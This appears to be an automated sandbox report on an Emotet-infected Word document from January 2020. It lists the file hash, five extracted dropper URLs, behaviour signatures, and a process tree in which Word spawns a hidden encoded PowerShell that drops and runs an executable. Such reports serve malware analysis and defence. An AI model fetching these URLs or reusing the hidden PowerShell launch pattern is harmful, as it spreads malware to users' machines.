Analysis

  • max time kernel
    27s
  • resource
    win10v191014
  • submitted
    24/01/2020, 08:50

General

  • Target

    11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4.doc

  • Sample

    200124-hm2p6k48xa

  • SHA256

    11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    http://taichungchurch.com/calendar/con-9xr-04992723/
  • exe.dropper
    http://test.nouraalmutairi.com/alfacgiapi/xa343f1lp-psspqrq-5769/
  • exe.dropper
    http://sunshinewebsite.club/delcot/itqi-jettzdorn-7561/
  • exe.dropper
    http://skyhimalayantours.com/nff/eynh46ml83-yebbh-72469/
  • exe.dropper
    http://tecnobau.cl/wp-includes/omFJFdefZ/

Extracted

  • Family
    emotet
  • C2


  • rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    PID:4968
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4572
    • C:\Users\Admin\269.exe
      "C:\Users\Admin\269.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4704
      • C:\Users\Admin\269.exe
        --ad15cb13
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:3912

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3912-8-0x0000000002240000-0x0000000002257000-memory.dmp

    Filesize

    92KB

  • memory/3912-9-0x0000000000400000-0x0000000000472000-memory.dmp

    Filesize

    456KB

  • memory/4704-6-0x00000000022B0000-0x00000000022C7000-memory.dmp

    Filesize

    92KB